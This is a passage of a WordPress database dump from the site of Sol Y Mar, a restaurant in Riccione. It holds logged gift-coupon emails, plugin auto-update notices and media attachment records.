\r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;margin: auto\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center;font-family: sans-serif;font-size: 15px;line-height: 20px;color: #555555\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;width: 50%\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px;text-align: center;width: 50%\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/12/regala-un-coupon.png\" width=\"100%\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif;font-size: 15px;line-height: 20px;color: #555555;padding: 10px;text-align: left\">\r\n<p style=\"min-height: 180px\">Cena delivery 28-11 <br>\r\nViale Ugo Foscolo 27 - Rimini  47921<br>\r\n371 3930671</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px;color: #373737\">\n<span style=\"float: left;padding: 0 3% 0 0;text-align: right\">Da :</span><span style=\"width: 75%;float: left\">Matteo Arlotti</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px;color: #373737\">\n<span style=\"float: left;padding: 0 3% 0 0;text-align: right\">A :</span><span style=\"width: 75%;float: left\">Matteo Arlotti</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px;color: #373737\">\r\n<h3 style=\"color: #557da1;font-weight: bold;line-height: 130%;margin: 16px 0 8px;text-align: left;font-size: 30px;font-family: Arial, Helvetica, sans-serif\"><span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center;background-color: #ffd5d5;padding: 10px\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;border-spacing: 20px;border: 2px dashed #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px;font-family: sans-serif;line-height: 20px;color: #ff9898;text-align: center;border: 3px\">\r\n<h2 style=\"color: #557da1;font-weight: bold;line-height: 130%;padding: 0px;margin: 10px 0px;font-family: Arial, Helvetica, sans-serif;font-size: 15px;text-align: center\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px;font-weight: bold;margin: 0px;text-align: center\"><img class=\"mwb_wgm_coupon_img\" id=\"1606573699www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1606573699solymarcouponE5MGX.png\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></p>\r\n<span style=\"font-size: 15px;text-align: center;padding: 10px 0px\">(Scadenza. 27/05/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;padding: 15px;color: #ffffff;background-color: #ff9898;font-size: 18px;font-family: Arial, Helvetica, sans-serif\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n\n\n','Sol Y Mar, ristorante a Riccione','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-9','','','2020-11-28 15:28:27','2020-11-28 14:28:27','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-9/',0,'postman_sent_mail','',0),(1264,0,'2020-11-28 15:28:27','2020-11-28 14:28:27','\n\n\n\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto;background-color: #ff9898;border-spacing: 10px\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;margin: 0 auto;width: 100%;padding: 10px 0px;border: 2px dashed #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0;text-align: left\"><a style=\"font-weight: normal;text-decoration: none;color: #ffffff;margin-left: 10px\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></a></td>\r\n<td style=\"padding: 10px 0;text-align: center\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center;padding: 2px 0px\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;margin: auto\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center;font-family: sans-serif;font-size: 15px;line-height: 20px;color: #555555\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;width: 50%\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px;text-align: center;width: 50%\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/12/regala-un-coupon.png\" width=\"100%\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif;font-size: 15px;line-height: 20px;color: #555555;padding: 10px;text-align: left\">\r\n<p style=\"min-height: 180px\">Cena delivery 28-11 <br>\r\nViale Ugo Foscolo 27 - Rimini  47921<br>\r\n371 3930671</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px;color: #373737\">\n<span style=\"float: left;padding: 0 3% 0 0;text-align: right\">Da :</span><span style=\"width: 75%;float: left\">Matteo Arlotti</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px;color: #373737\">\n<span style=\"float: left;padding: 0 3% 0 0;text-align: right\">A :</span><span style=\"width: 75%;float: left\">Matteo Arlotti</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px;color: #373737\">\r\n<h3 style=\"color: #557da1;font-weight: bold;line-height: 130%;margin: 16px 0 8px;text-align: left;font-size: 30px;font-family: Arial, Helvetica, sans-serif\"><span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center;background-color: #ffd5d5;padding: 10px\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;border-spacing: 20px;border: 2px dashed #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px;font-family: sans-serif;line-height: 20px;color: #ff9898;text-align: center;border: 3px\">\r\n<h2 style=\"color: #557da1;font-weight: bold;line-height: 130%;padding: 0px;margin: 10px 0px;font-family: Arial, Helvetica, sans-serif;font-size: 15px;text-align: center\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px;font-weight: bold;margin: 0px;text-align: center\"><img class=\"mwb_wgm_coupon_img\" id=\"1606573699www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1606573699solymarcouponE5MGX.png\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></p>\r\n<span style=\"font-size: 15px;text-align: center;padding: 10px 0px\">(Scadenza. 27/05/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;padding: 15px;color: #ffffff;background-color: #ff9898;font-size: 18px;font-family: Arial, Helvetica, sans-serif\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n\n\n','Sol Y Mar, ristorante a Riccione','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-10','','','2020-11-28 15:28:27','2020-11-28 14:28:27','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-10/',0,'postman_sent_mail','',0),(1265,0,'2020-12-02 13:22:39','2020-12-02 12:22:39','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Yoast SEO version 15.4\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-37','','','2020-12-02 13:22:39','2020-12-02 12:22:39','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-37/',0,'postman_sent_mail','',0),(1266,0,'2020-12-02 13:22:39','2020-12-02 12:22:39','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Yoast SEO version 15.4\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-38','','','2020-12-02 13:22:39','2020-12-02 12:22:39','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-38/',0,'postman_sent_mail','',0),(1267,0,'2020-12-05 01:22:34','2020-12-05 00:22:34','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Smash Balloon Instagram Feed version 2.6.1\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-39','','','2020-12-05 01:22:34','2020-12-05 00:22:34','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-39/',0,'postman_sent_mail','',0),(1268,0,'2020-12-05 01:22:34','2020-12-05 00:22:34','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Smash Balloon Instagram Feed version 2.6.1\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-40','','','2020-12-05 01:22:34','2020-12-05 00:22:34','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-40/',0,'postman_sent_mail','',0),(1271,1,'2020-12-05 10:41:40','2020-12-05 09:41:40','{{unknown}}','','','publish','closed','closed','','457a3fc53d9b77fd5de963b2b85a85db','','','2020-12-05 10:41:40','2020-12-05 09:41:40','',0,'https://www.ristorantesolymar.it/2020/12/05/457a3fc53d9b77fd5de963b2b85a85db/',0,'oembed_cache','',0),(4303,1,'2018-08-08 08:18:20','2018-08-08 08:18:20','','accolades-left-img','','inherit','open','closed','','accolades-left-img','','','2018-08-08 08:18:20','2018-08-08 08:18:20','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/accolades-left-img.png',0,'attachment','image/png',0),(3696,0,'2021-01-05 01:29:09','2021-01-05 00:29:09','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- UpdraftPlus - Backup/Restore (from version 1.16.43 to 1.16.45)\n- WP Fastest Cache (from version 0.9.1.3 to 0.9.1.4)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-16','','','2021-01-05 01:29:09','2021-01-05 00:29:09','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-16/',0,'postman_sent_mail','',0),(4239,1,'2018-07-27 15:22:56','2018-07-27 15:22:56','','blog-post-img-5','','inherit','open','closed','','blog-post-img-5','','','2018-07-27 15:22:56','2018-07-27 15:22:56','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/blog-post-img-5.jpg',0,'attachment','image/jpeg',0),(4240,1,'2018-07-30 13:16:23','2018-07-30 13:16:23','','shop-img-12','','inherit','open','closed','','shop-img-12','','','2018-07-30 13:16:23','2018-07-30 13:16:23','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-12.jpg',0,'attachment','image/jpeg',0),(4241,1,'2018-07-31 10:49:00','2018-07-31 10:49:00','','map-pin','','inherit','open','closed','','map-pin','','','2018-07-31 10:49:00','2018-07-31 10:49:00','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/map-pin.png',0,'attachment','image/png',0),(4242,1,'2018-08-03 14:48:39','2018-08-03 14:48:39','','shop-img-30','','inherit','open','closed','','shop-img-30','','','2018-08-03 14:48:39','2018-08-03 14:48:39','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/shop-img-30.jpg',0,'attachment','image/jpeg',0),(4243,1,'2018-08-08 08:18:22','2018-08-08 08:18:22','','accolades-right-img','','inherit','open','closed','','accolades-right-img','','','2018-08-08 08:18:22','2018-08-08 08:18:22','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/accolades-right-img.jpg',0,'attachment','image/jpeg',0),(282,1,'2018-07-31 13:42:02','2018-07-31 13:42:02','','shop-img-23','','inherit','open','closed','','shop-img-23','','','2018-07-31 13:42:02','2018-07-31 13:42:02','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-23.jpg',0,'attachment','image/jpeg',0),(4244,1,'2018-07-31 11:25:47','2018-07-31 11:25:47','','shop-sidebar-img','','inherit','open','closed','','shop-sidebar-img','','','2018-07-31 11:25:47','2018-07-31 11:25:47','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-sidebar-img.jpg',0,'attachment','image/jpeg',0),(4245,1,'2018-07-30 10:56:39','2018-07-30 10:56:39','','autor-img','','inherit','open','closed','','autor-img','','','2018-07-30 10:56:39','2018-07-30 10:56:39','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/autor-img.png',0,'attachment','image/png',0),(4246,1,'2018-07-31 08:06:55','2018-07-31 08:06:55','','h1-port-img-1','','inherit','open','closed','','h1-port-img-1','','','2018-07-31 08:06:55','2018-07-31 08:06:55','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-port-img-1.jpg',0,'attachment','image/jpeg',0),(4247,1,'2018-07-30 13:15:32','2018-07-30 13:15:32','','shop-img-1','','inherit','open','closed','','shop-img-1','','','2018-07-30 13:15:32','2018-07-30 13:15:32','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-1.jpg',0,'attachment','image/jpeg',0),(4248,1,'2018-08-06 11:08:14','2018-08-06 11:08:14','','port-single-img-1','','inherit','open','closed','','port-single-img-1-2','','','2018-08-06 11:08:14','2018-08-06 11:08:14','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/port-single-img-1-1.jpg',0,'attachment','image/jpeg',0),(4249,1,'2018-08-01 13:15:41','2018-08-01 13:15:41','','footer-img-1','','inherit','open','closed','','footer-img-1','','','2018-08-01 13:15:41','2018-08-01 13:15:41','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/footer-img-1.png',0,'attachment','image/png',0),(703,1,'2018-08-08 08:40:30','2018-08-08 08:40:30','','accolades-content-img','','inherit','open','closed','','accolades-content-img','','','2018-08-08 08:40:30','2018-08-08 08:40:30','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/accolades-content-img.jpg',0,'attachment','image/jpeg',0),(4250,1,'2018-07-31 12:05:06','2018-07-31 12:05:06','','h1-img-10','','inherit','open','closed','','h1-img-10','','','2018-07-31 12:05:06','2018-07-31 12:05:06','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-img-10.jpg',0,'attachment','image/jpeg',0),(4251,1,'2018-08-08 09:31:43','2018-08-08 09:31:43','','chef-bio-img','','inherit','open','closed','','chef-bio-img','','','2018-08-08 09:31:43','2018-08-08 09:31:43','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/chef-bio-img.jpg',0,'attachment','image/jpeg',0),(4252,1,'2018-07-31 12:29:45','2018-07-31 12:29:45','','pin-img-1','','inherit','open','closed','','pin-img-1','','','2018-07-31 12:29:45','2018-07-31 12:29:45','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/pin-img-1.png',0,'attachment','image/png',0),(4253,1,'2018-08-01 13:46:26','2018-08-01 13:46:26','','h1-img-12','','inherit','open','closed','','h1-img-12','','','2018-08-01 13:46:26','2018-08-01 13:46:26','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h1-img-12.jpg',0,'attachment','image/jpeg',0),(39,1,'2018-07-30 13:15:37','2018-07-30 13:15:37','','shop-img-2','','inherit','open','closed','','shop-img-2','','','2018-07-30 13:15:37','2018-07-30 13:15:37','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-2.jpg',0,'attachment','image/jpeg',0),(4254,1,'2018-07-31 13:26:32','2018-07-31 13:26:32','','h1-img-11','','inherit','open','closed','','h1-img-11','','','2018-07-31 13:26:32','2018-07-31 13:26:32','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-img-11.jpg',0,'attachment','image/jpeg',0),(4255,1,'2018-07-31 08:13:15','2018-07-31 08:13:15','','h1-port-img-2','','inherit','open','closed','','h1-port-img-2','','','2018-07-31 08:13:15','2018-07-31 08:13:15','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-port-img-2.jpg',0,'attachment','image/jpeg',0),(4256,1,'2018-08-06 11:08:21','2018-08-06 11:08:21','','port-single-img-2','','inherit','open','closed','','port-single-img-2-2','','','2018-08-06 11:08:21','2018-08-06 11:08:21','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/port-single-img-2-1.jpg',0,'attachment','image/jpeg',0),(4257,1,'2018-08-02 10:52:54','2018-08-02 10:52:54','','drink-menu-backround','','inherit','open','closed','','drink-menu-backround','','','2018-08-02 10:52:54','2018-08-02 10:52:54','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/drink-menu-backround.jpg',0,'attachment','image/jpeg',0),(4258,1,'2018-07-30 13:15:45','2018-07-30 13:15:45','','shop-img-3','','inherit','open','closed','','shop-img-3','','','2018-07-30 13:15:45','2018-07-30 13:15:45','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-3.jpg',0,'attachment','image/jpeg',0),(4259,1,'2018-07-31 13:41:27','2018-07-31 13:41:27','','shop-img-14','','inherit','open','closed','','shop-img-14','','','2018-07-31 13:41:27','2018-07-31 13:41:27','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-14.jpg',0,'attachment','image/jpeg',0),(4260,1,'2018-08-08 09:37:15','2018-08-08 09:37:15','','chef-bio-left-img','','inherit','open','closed','','chef-bio-left-img','','','2018-08-08 09:37:15','2018-08-08 09:37:15','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/chef-bio-left-img.png',0,'attachment','image/png',0),(4261,1,'2018-07-31 08:13:19','2018-07-31 08:13:19','','h1-port-img-3','','inherit','open','closed','','h1-port-img-3','','','2018-07-31 08:13:19','2018-07-31 08:13:19','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-port-img-3.jpg',0,'attachment','image/jpeg',0),(4262,1,'2018-08-08 09:41:47','2018-08-08 09:41:47','','chef-bio-content-img','','inherit','open','closed','','chef-bio-content-img','','','2018-08-08 09:41:47','2018-08-08 09:41:47','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/chef-bio-content-img.jpg',0,'attachment','image/jpeg',0),(4263,1,'2018-08-06 11:08:24','2018-08-06 11:08:24','','port-single-img-3','','inherit','open','closed','','port-single-img-3','','','2018-08-06 11:08:24','2018-08-06 11:08:24','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/port-single-img-3.jpg',0,'attachment','image/jpeg',0),(4264,1,'2018-07-31 13:41:31','2018-07-31 13:41:31','','shop-img-15','','inherit','open','closed','','shop-img-15','','','2018-07-31 13:41:31','2018-07-31 13:41:31','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-15.jpg',0,'attachment','image/jpeg',0),(41,1,'2018-07-30 13:15:51','2018-07-30 13:15:51','','shop-img-4','','inherit','open','closed','','shop-img-4','','','2018-07-30 13:15:51','2018-07-30 13:15:51','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-4.jpg',0,'attachment','image/jpeg',0),(4265,1,'2018-08-03 08:35:14','2018-08-03 08:35:14','','food-menu-backround','','inherit','open','closed','','food-menu-backround','','','2018-08-03 08:35:14','2018-08-03 08:35:14','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/food-menu-backround.jpg',0,'attachment','image/jpeg',0),(4266,1,'2018-07-31 08:28:28','2018-07-31 08:28:28','','h1-img-5','','inherit','open','closed','','h1-img-5','','','2018-07-31 08:28:28','2018-07-31 08:28:28','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-img-5.jpg',0,'attachment','image/jpeg',0),(4267,1,'2018-08-08 10:40:08','2018-08-08 10:40:08','','our-history-right-img','','inherit','open','closed','','our-history-right-img','','','2018-08-08 10:40:08','2018-08-08 10:40:08','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/our-history-right-img.jpg',0,'attachment','image/jpeg',0),(42,1,'2018-07-30 13:15:54','2018-07-30 13:15:54','','shop-img-5','','inherit','open','closed','','shop-img-5','','','2018-07-30 13:15:54','2018-07-30 13:15:54','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-5.jpg',0,'attachment','image/jpeg',0),(4268,1,'2018-07-31 13:41:36','2018-07-31 13:41:36','','shop-img-16','','inherit','open','closed','','shop-img-16','','','2018-07-31 13:41:36','2018-07-31 13:41:36','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-16.jpg',0,'attachment','image/jpeg',0),(156,1,'2018-07-31 08:37:28','2018-07-31 08:37:28','','h1-img-6','','inherit','open','closed','','h1-img-6','','','2018-07-31 08:37:28','2018-07-31 08:37:28','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-img-6.jpg',0,'attachment','image/jpeg',0),(4269,1,'2018-08-06 13:10:03','2018-08-06 13:10:03','','h8-img-1','','inherit','open','closed','','h8-img-1','','','2018-08-06 13:10:03','2018-08-06 13:10:03','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h8-img-1.jpg',0,'attachment','image/jpeg',0),(4270,1,'2018-08-08 10:49:55','2018-08-08 10:49:55','','our-history-left-img','','inherit','open','closed','','our-history-left-img','','','2018-08-08 10:49:55','2018-08-08 10:49:55','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/our-history-left-img.jpg',0,'attachment','image/jpeg',0),(4271,1,'2018-07-31 13:41:40','2018-07-31 13:41:40','','shop-img-17','','inherit','open','closed','','shop-img-17','','','2018-07-31 13:41:40','2018-07-31 13:41:40','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-17.jpg',0,'attachment','image/jpeg',0),(4272,1,'2018-08-03 12:11:05','2018-08-03 12:11:05','','shop-img-13','','inherit','open','closed','','shop-img-13','','','2018-08-03 12:11:05','2018-08-03 12:11:05','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/shop-img-13.jpg',0,'attachment','image/jpeg',0),(4273,1,'2018-07-30 13:15:59','2018-07-30 13:15:59','','shop-img-6','','inherit','open','closed','','shop-img-6','','','2018-07-30 13:15:59','2018-07-30 13:15:59','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-6.jpg',0,'attachment','image/jpeg',0),(4274,1,'2018-08-08 10:49:57','2018-08-08 10:49:57','','our-history-section-img','','inherit','open','closed','','our-history-section-img','','','2018-08-08 10:49:57','2018-08-08 10:49:57','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/our-history-section-img.jpg',0,'attachment','image/jpeg',0),(4275,1,'2018-08-06 14:01:01','2018-08-06 14:01:01','','h8-img-3','','inherit','open','closed','','h8-img-3','','','2018-08-06 14:01:01','2018-08-06 14:01:01','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h8-img-3.jpg',0,'attachment','image/jpeg',0),(4276,1,'2018-07-31 08:57:11','2018-07-31 08:57:11','','h1-single-img-1','','inherit','open','closed','','h1-single-img-1','','','2018-07-31 08:57:11','2018-07-31 08:57:11','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-single-img-1.jpg',0,'attachment','image/jpeg',0),(587,1,'2018-08-06 14:02:59','2018-08-06 14:02:59','','h8-img-2a','','inherit','open','closed','','h8-img-2a','','','2018-08-06 14:02:59','2018-08-06 14:02:59','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h8-img-2a.jpg',0,'attachment','image/jpeg',0),(4277,1,'2018-07-31 13:41:43','2018-07-31 13:41:43','','shop-img-18','','inherit','open','closed','','shop-img-18','','','2018-07-31 13:41:43','2018-07-31 13:41:43','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-18.jpg',0,'attachment','image/jpeg',0),(4278,1,'2018-08-08 11:03:11','2018-08-08 11:03:11','','kitchen-content-img','','inherit','open','closed','','kitchen-content-img','','','2018-08-08 11:03:11','2018-08-08 11:03:11','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/kitchen-content-img.jpg',0,'attachment','image/jpeg',0),(4279,1,'2018-08-03 13:15:22','2018-08-03 13:15:22','','visit-us-parallax','','inherit','open','closed','','visit-us-parallax','','','2018-08-03 13:15:22','2018-08-03 13:15:22','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/visit-us-parallax.jpg',0,'attachment','image/jpeg',0),(44,1,'2018-07-30 13:16:02','2018-07-30 13:16:02','','shop-img-7','','inherit','open','closed','','shop-img-7','','','2018-07-30 13:16:02','2018-07-30 